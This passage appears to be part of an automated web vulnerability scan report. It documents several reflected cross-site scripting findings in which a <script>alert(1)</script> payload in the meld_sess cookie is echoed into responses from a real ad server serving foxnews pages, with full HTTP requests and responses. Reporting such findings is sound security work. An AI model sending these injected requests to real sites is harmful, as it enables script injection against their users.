The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 292b6"><script>alert(1)</script>f08dbb572df was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/ros?t=1302543075864&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e292b6"><script>alert(1)</script>f08dbb572df; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA2MCwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiZTk5MThhZjktYWZjOS00YzYyLWI4MmMtMzVhN2I3MWI0YzQxIiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZTI5MmI2Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+ZjA4ZGJiNTcyZGYiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICJlOTkxOGFmOS1hZmM5LTRjNjItYjgyYy0zNWE3YjcxYjRjNDEiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgInJlYWwtdGltZSBiaWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAyMzMsICBhY2NvdW50X2lkOiAgIDYyODksICBuZXR3b3JrX25hbWU6ICJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS43NiIsICBmZWNwbTogICAgICAgICIxLjc2IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJyb3MiLCAgcnVsZTogICAgICAgICAicm9zIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6NjMwNjAsICJidXkiOjE3OCwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODIsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTksICJidXkiOjE5NiwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xNiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk4MSwgImJ1eSI6MjAwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsICBob3N0OiAgICAgICAgICJuai10YWc0NCJ9
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:31:22 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e292b6"><script>alert(1)</script>f08dbb572df&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
1.159. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1db9d"><script>alert(1)</script>278531f8b82 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/ros?t=1302543075864&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e1db9d"><script>alert(1)</script>278531f8b82; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA2MCwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiYzEyNzcwMDMtMGZiNi00NGRhLTkzZmItMDVhMWY3NzAwOGIwIiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZTFkYjlkIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+Mjc4NTMxZjhiODIiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICJjMTI3NzAwMy0wZmI2LTQ0ZGEtOTNmYi0wNWExZjc3MDA4YjAiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgInJlYWwtdGltZSBiaWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAyMzMsICBhY2NvdW50X2lkOiAgIDYyODksICBuZXR3b3JrX25hbWU6ICJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS43NiIsICBmZWNwbTogICAgICAgICIxLjc2IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJyb3MiLCAgcnVsZTogICAgICAgICAicm9zIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6NjMwNjAsICJidXkiOjE3OCwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODIsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTksICJidXkiOjE5NiwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xNiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk4MSwgImJ1eSI6MjAwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsICBob3N0OiAgICAgICAgICJuai10YWcyNiJ9
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:31:21 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e1db9d"><script>alert(1)</script>278531f8b82&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
1.160. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df14e"><script>alert(1)</script>027a0ae2e79 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnewsrtb/300x250/ros?t=1302544276627&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024edf14e"><script>alert(1)</script>027a0ae2e79; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU4NzIsICBuZXR3b3JrOiAgICAgICJtYXhwb2ludCIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtOTk5IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICJhNjU4MTQxZS01NTYxLTQ0ZjMtOTQ4Ny1hMGJmOTRmMTMzMTQiLCAgdXNlcjogICAgICAgICAiZTM2YTJmMjAtOTk4NS00ZGNkLTgyZTktNmZmMDMxMmUwMjRlZGYxNGUiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4wMjdhMGFlMmU3OSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAicm9zIiwgIGRpdjogICAgICAgICAgImE2NTgxNDFlLTU1NjEtNDRmMy05NDg3LWEwYmY5NGYxMzMxNCIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAicmVhbC10aW1lIGJpZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDIzMywgIGFjY291bnRfaWQ6ICAgNjI4OSwgIG5ldHdvcmtfbmFtZTogIk1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjc2IiwgIGZlY3BtOiAgICAgICAgIjEuNzYiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInJvcyIsICBydWxlOiAgICAgICAgICJyb3MiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMy4wMSIsImFkIjozMzU4NzIsICJidXkiOjE3NiwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU5MDksICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTYyMTIsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTg3OSwgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93d3cuZmFjZWJvb2suY29tL1N1cGVyOD92PWFwcF82MDA5Mjk0MDg2IiwiYW4iOiJTdXBlciA4Iiwic3RhdHVzIjoiMC4wNCIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4ODIsICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsICBob3N0OiAgICAgICAgICJuai10YWczNSJ9
Content-Length: 1674
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:51:26 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=e36a2f20-9985-4dcd-82e9-6ff0312e024edf14e"><script>alert(1)</script>027a0ae2e79&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024edf14e">
...[SNIP]...
1.161. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94090"><script>alert(1)</script>c17b581f298 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnewsrtb/300x250/ros?t=1302544276627&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e94090"><script>alert(1)</script>c17b581f298; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU4NzIsICBuZXR3b3JrOiAgICAgICJtYXhwb2ludCIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtOTk5IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICJiOGRkOTkwYi1hZTBlLTRkOWQtYTE2Mi0zYjYyOWExNWI3MGEiLCAgdXNlcjogICAgICAgICAiZTM2YTJmMjAtOTk4NS00ZGNkLTgyZTktNmZmMDMxMmUwMjRlOTQwOTAiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD5jMTdiNTgxZjI5OCIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAicm9zIiwgIGRpdjogICAgICAgICAgImI4ZGQ5OTBiLWFlMGUtNGQ5ZC1hMTYyLTNiNjI5YTE1YjcwYSIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAicmVhbC10aW1lIGJpZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDIzMywgIGFjY291bnRfaWQ6ICAgNjI4OSwgIG5ldHdvcmtfbmFtZTogIk1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjc2IiwgIGZlY3BtOiAgICAgICAgIjEuNzYiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInJvcyIsICBydWxlOiAgICAgICAgICJyb3MiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMy4wMSIsImFkIjozMzU4NzIsICJidXkiOjE3NiwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU5MDksICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdWJlbW9ndWwgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1ODk2MjEyLCAiYnV5Ijo4NDcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4NzksICJidXkiOjE4OSwibHAiOiJodHRwOi8vY3J1aXNlLnNlYWJvdXJuLmNvbS8/aWJwLWNhbXA9VHVybl9PbmxpbmUiLCJhbiI6IllhY2h0cyBvZiBTZWFib3VybiIsInN0YXR1cyI6IjAuMDkiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1ODgyLCAiYnV5IjoxOTksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9XSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgImh0dHA6Ly93d3cudHlzb24uY29tL0NvbnN1bWVyL1Byb2R1Y3RzL1Byb21vdGlvbnMvVWx0aW1hdGVDaGlja2VuU2FuZHdpY2guYXNweD9jbXBpZD1TYW5kd2ljaEFueU5pZ2h0R1NOZXR3b3JrIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ3In0=
Content-Length: 1674
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:51:26 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e94090"><script>alert(1)</script>c17b581f298&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
1.162. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/728x90/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6816"><script>alert(1)</script>c086142570 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

